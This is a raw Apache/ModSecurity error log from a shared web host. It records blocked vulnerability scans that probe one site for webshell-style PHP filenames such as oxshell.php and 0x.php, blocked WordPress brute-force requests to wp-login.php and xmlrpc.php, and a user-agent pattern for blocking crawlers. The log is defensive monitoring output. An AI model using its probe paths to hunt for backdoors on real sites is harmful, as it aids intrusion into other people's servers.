[Tue May 26 16:16:40.677454 2026] [security2:error] [pid 782634:tid 782868] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6EP_P9qBfeb1w76ZPlwAAAGg"]
[Tue May 26 16:16:41.900941 2026] [security2:error] [pid 782634:tid 782801] [client 62.60.130.210:49647] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 210.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "senoro.com.mx"] [uri "/wp-login.php"] [unique_id "ahV6Ef_P9qBfeb1w76ZPrQAAACU"]
[Tue May 26 16:16:42.271933 2026] [security2:error] [pid 782634:tid 782835] [client 62.60.130.210:50377] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 210.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "senoro.com.mx"] [uri "/wp-login.php"] [unique_id "ahV6Ev_P9qBfeb1w76ZPwgAAAEc"]
[Tue May 26 16:16:42.284233 2026] [core:error] [pid 782634:tid 782780] (104)Connection reset by peer: [client 45.154.98.76:49862] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 16:16:42.316222 2026] [security2:error] [pid 782634:tid 782844] [client 20.192.3.167:12256] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/edit.php"] [unique_id "ahV6Ev_P9qBfeb1w76ZPwwAAAFA"]
[Tue May 26 16:16:42.586358 2026] [security2:error] [pid 782634:tid 782805] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Ev_P9qBfeb1w76ZPugAAACk"]
[Tue May 26 16:16:43.301683 2026] [security2:error] [pid 782634:tid 782860] [client 20.192.3.167:5016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/f35.php"] [unique_id "ahV6E__P9qBfeb1w76ZP1wAAAGA"]
[Tue May 26 16:16:44.125317 2026] [security2:error] [pid 782634:tid 782789] [client 20.192.3.167:11639] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/fff.php"] [unique_id "ahV6FP_P9qBfeb1w76ZP6wAAABk"]
[Tue May 26 16:16:44.548559 2026] [security2:error] [pid 782634:tid 782788] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6FP_P9qBfeb1w76ZP6QAAABg"]
[Tue May 26 16:16:44.992066 2026] [security2:error] [pid 782634:tid 782875] [client 20.192.3.167:3250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/ff1.php"] [unique_id "ahV6FP_P9qBfeb1w76ZQBAAAAG8"]
[Tue May 26 16:16:45.397359 2026] [security2:error] [pid 782634:tid 782881] [client 98.195.177.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6FP_P9qBfeb1w76ZQAwAAAHU"]
[Tue May 26 16:16:45.847422 2026] [security2:error] [pid 782634:tid 782868] [client 20.192.3.167:7140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/flower.php"] [unique_id "ahV6Ff_P9qBfeb1w76ZQGwAAAGg"]
[Tue May 26 16:16:46.477698 2026] [security2:error] [pid 782634:tid 782784] [client 103.44.52.196:57940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV6Fv_P9qBfeb1w76ZQKwAAABQ"]
[Tue May 26 16:16:46.477868 2026] [security2:error] [pid 782634:tid 782784] [client 103.44.52.196:57940] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV6Fv_P9qBfeb1w76ZQKwAAABQ"]
[Tue May 26 16:16:46.745712 2026] [security2:error] [pid 782634:tid 782764] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Fv_P9qBfeb1w76ZQJAAAAAA"]
[Tue May 26 16:16:46.856154 2026] [security2:error] [pid 782634:tid 782799] [client 20.192.3.167:12263] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/file.php"] [unique_id "ahV6Fv_P9qBfeb1w76ZQMgAAACM"]
[Tue May 26 16:16:47.607105 2026] [core:error] [pid 782634:tid 782800] (104)Connection reset by peer: [client 45.154.98.76:57125] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 16:16:47.743291 2026] [security2:error] [pid 782634:tid 782867] [client 20.192.3.167:10949] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/goods.php"] [unique_id "ahV6F__P9qBfeb1w76ZQQAAAAGc"]
[Tue May 26 16:16:48.312463 2026] [security2:error] [pid 782634:tid 782849] [client 106.219.85.83:31268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6GP_P9qBfeb1w76ZQVgAAAFU"]
[Tue May 26 16:16:48.312581 2026] [security2:error] [pid 782634:tid 782849] [client 106.219.85.83:31268] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6GP_P9qBfeb1w76ZQVgAAAFU"]
[Tue May 26 16:16:48.567470 2026] [security2:error] [pid 782634:tid 782782] [client 20.192.3.167:11836] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/g.php"] [unique_id "ahV6GP_P9qBfeb1w76ZQWQAAABI"]
[Tue May 26 16:16:48.655463 2026] [security2:error] [pid 782634:tid 782874] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6GP_P9qBfeb1w76ZQUgAAAG4"]
[Tue May 26 16:16:49.407260 2026] [security2:error] [pid 782634:tid 782838] [client 20.192.3.167:3223] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/hplfuns.php"] [unique_id "ahV6Gf_P9qBfeb1w76ZQcAAAAEo"]
[Tue May 26 16:16:50.231561 2026] [security2:error] [pid 782634:tid 782887] [client 20.192.3.167:2320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/ioxi-o.php"] [unique_id "ahV6Gv_P9qBfeb1w76ZQiQAAAHs"]
[Tue May 26 16:16:50.531947 2026] [security2:error] [pid 782634:tid 782849] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Gv_P9qBfeb1w76ZQiAAAAFU"]
[Tue May 26 16:16:51.093867 2026] [security2:error] [pid 782634:tid 782806] [client 20.192.3.167:5049] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/in.php"] [unique_id "ahV6G__P9qBfeb1w76ZQnwAAACo"]
[Tue May 26 16:16:51.944310 2026] [security2:error] [pid 782634:tid 782783] [client 114.119.156.165:25969] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahV6G__P9qBfeb1w76ZQsQAAABM"], referer: http://glorodavionics.com/beta/index.php?route=product%2Fproduct&manufacturer_id=11&product_id=211&page=6
[Tue May 26 16:16:52.009510 2026] [security2:error] [pid 782634:tid 782879] [client 20.192.3.167:10863] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/info.php"] [unique_id "ahV6HP_P9qBfeb1w76ZQtQAAAHM"]
[Tue May 26 16:16:52.716753 2026] [security2:error] [pid 782634:tid 782887] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6HP_P9qBfeb1w76ZQwAAAAHs"]
[Tue May 26 16:16:52.907047 2026] [security2:error] [pid 782634:tid 782866] [client 20.192.3.167:12258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/inputs.php"] [unique_id "ahV6HP_P9qBfeb1w76ZQ2gAAAGY"]
[Tue May 26 16:16:53.304793 2026] [core:error] [pid 782634:tid 782785] (104)Connection reset by peer: [client 45.154.98.76:62559] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 16:16:53.752808 2026] [security2:error] [pid 782634:tid 782823] [client 20.192.3.167:13981] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/item.php"] [unique_id "ahV6Hf_P9qBfeb1w76ZQ9gAAADs"]
[Tue May 26 16:16:54.523337 2026] [security2:error] [pid 782634:tid 782773] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Hv_P9qBfeb1w76ZRBQAAAAk"]
[Tue May 26 16:16:54.733485 2026] [security2:error] [pid 782634:tid 782812] [client 20.192.3.167:2335] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/k.php"] [unique_id "ahV6Hv_P9qBfeb1w76ZREAAAADA"]
[Tue May 26 16:16:55.683189 2026] [security2:error] [pid 782634:tid 782867] [client 20.192.3.167:9830] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/license.php"] [unique_id "ahV6H__P9qBfeb1w76ZRJgAAAGc"]
[Tue May 26 16:16:56.659536 2026] [security2:error] [pid 782634:tid 782828] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6IP_P9qBfeb1w76ZRNgAAAEA"]
[Tue May 26 16:16:56.662478 2026] [security2:error] [pid 782634:tid 782782] [client 20.192.3.167:6996] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/load.php"] [unique_id "ahV6IP_P9qBfeb1w76ZRPgAAABI"]
[Tue May 26 16:16:57.004222 2026] [security2:error] [pid 782634:tid 782826] [client 103.44.52.196:32802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV6If_P9qBfeb1w76ZRRgAAAD4"]
[Tue May 26 16:16:57.004373 2026] [security2:error] [pid 782634:tid 782826] [client 103.44.52.196:32802] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV6If_P9qBfeb1w76ZRRgAAAD4"]
[Tue May 26 16:16:57.603241 2026] [security2:error] [pid 782634:tid 782778] [client 20.192.3.167:13995] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/manager.php"] [unique_id "ahV6If_P9qBfeb1w76ZRUQAAAA4"]
[Tue May 26 16:16:58.391857 2026] [security2:error] [pid 782634:tid 782814] [client 34.29.36.64:53173] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 64.36.29.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mosykay.com"] [uri "/xmlrpc.php"] [unique_id "ahV6Iv_P9qBfeb1w76ZRXwAAADI"]
[Tue May 26 16:16:58.392028 2026] [security2:error] [pid 782634:tid 782814] [client 34.29.36.64:53173] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "mosykay.com"] [uri "/xmlrpc.php"] [unique_id "ahV6Iv_P9qBfeb1w76ZRXwAAADI"]
[Tue May 26 16:16:58.488689 2026] [security2:error] [pid 782634:tid 782883] [client 20.192.3.167:7050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/media.php"] [unique_id "ahV6Iv_P9qBfeb1w76ZRbAAAAHc"]
[Tue May 26 16:16:58.761058 2026] [security2:error] [pid 782634:tid 782817] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Iv_P9qBfeb1w76ZRZQAAADU"]
[Tue May 26 16:16:58.777802 2026] [core:error] [pid 782634:tid 782881] (104)Connection reset by peer: [client 45.154.98.76:56231] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 16:16:59.066664 2026] [security2:error] [pid 782634:tid 782856] [client 106.219.85.83:18755] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6Iv_P9qBfeb1w76ZRdQAAAFw"]
[Tue May 26 16:16:59.066833 2026] [security2:error] [pid 782634:tid 782856] [client 106.219.85.83:18755] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6Iv_P9qBfeb1w76ZRdQAAAFw"]
[Tue May 26 16:16:59.495421 2026] [security2:error] [pid 782634:tid 782773] [client 20.192.3.167:2518] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/mar.php"] [unique_id "ahV6I__P9qBfeb1w76ZRgQAAAAk"]
[Tue May 26 16:17:00.328571 2026] [security2:error] [pid 782634:tid 782838] [client 20.192.3.167:9706] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/my1.php"] [unique_id "ahV6JP_P9qBfeb1w76ZRlAAAAEo"]
[Tue May 26 16:17:00.450414 2026] [security2:error] [pid 782634:tid 782790] [client 209.59.231.224:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV6JP_P9qBfeb1w76ZRlwAAABo"], referer: https://www.anujtradingco.com/
[Tue May 26 16:17:00.636810 2026] [security2:error] [pid 782634:tid 782861] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6JP_P9qBfeb1w76ZRkwAAAGE"]
[Tue May 26 16:17:01.154329 2026] [security2:error] [pid 782634:tid 782794] [client 20.192.3.167:4291] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/mm.php"] [unique_id "ahV6Jf_P9qBfeb1w76ZRpAAAAB4"]
[Tue May 26 16:17:02.058257 2026] [security2:error] [pid 782634:tid 782773] [client 209.59.231.224:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV6Jf_P9qBfeb1w76ZRtwAAAAk"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1219367&moderation-hash=e1ace62890108a8964350a02de014665
[Tue May 26 16:17:02.094149 2026] [security2:error] [pid 782634:tid 782828] [client 20.192.3.167:2354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/network.php"] [unique_id "ahV6Jv_P9qBfeb1w76ZRuwAAAEA"]
[Tue May 26 16:17:02.676986 2026] [security2:error] [pid 782634:tid 782866] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Jv_P9qBfeb1w76ZRwQAAAGY"]
[Tue May 26 16:17:02.959647 2026] [security2:error] [pid 782634:tid 782783] [client 20.192.3.167:10864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/new.php"] [unique_id "ahV6Jv_P9qBfeb1w76ZRzwAAABM"]
[Tue May 26 16:17:04.151852 2026] [security2:error] [pid 782634:tid 782781] [client 20.192.3.167:4075] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/0x.php"] [unique_id "ahV6KP_P9qBfeb1w76ZR5QAAABE"]
[Tue May 26 16:17:04.285673 2026] [core:error] [pid 782634:tid 782863] (104)Connection reset by peer: [client 45.154.98.76:62512] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 16:17:04.731154 2026] [security2:error] [pid 782634:tid 782878] [client 31.57.184.107:58721] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahV6KP_P9qBfeb1w76ZR7wAAAHI"], referer: https://duckduckgo.com/
[Tue May 26 16:17:04.783907 2026] [security2:error] [pid 782634:tid 782879] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6KP_P9qBfeb1w76ZR6wAAAHM"]
[Tue May 26 16:17:05.042830 2026] [security2:error] [pid 782634:tid 782848] [client 20.192.3.167:1986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/0.php"] [unique_id "ahV6Kf_P9qBfeb1w76ZR-AAAAFQ"]
[Tue May 26 16:17:05.149348 2026] [security2:error] [pid 782634:tid 782833] [client 49.36.115.179:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahV6Kf_P9qBfeb1w76ZR_AAAAEU"]
[Tue May 26 16:17:05.149652 2026] [security2:error] [pid 782634:tid 782873] [client 49.36.115.179:40810] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahV6Kf_P9qBfeb1w76ZR9wAAAG0"]
[Tue May 26 16:17:05.174023 2026] [security2:error] [pid 782634:tid 782867] [client 31.57.184.107:59694] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahV6Kf_P9qBfeb1w76ZSAAAAAGc"]
[Tue May 26 16:17:05.926041 2026] [security2:error] [pid 782634:tid 782827] [client 20.192.3.167:10978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/oxshell.php"] [unique_id "ahV6Kf_P9qBfeb1w76ZSFgAAAD8"]
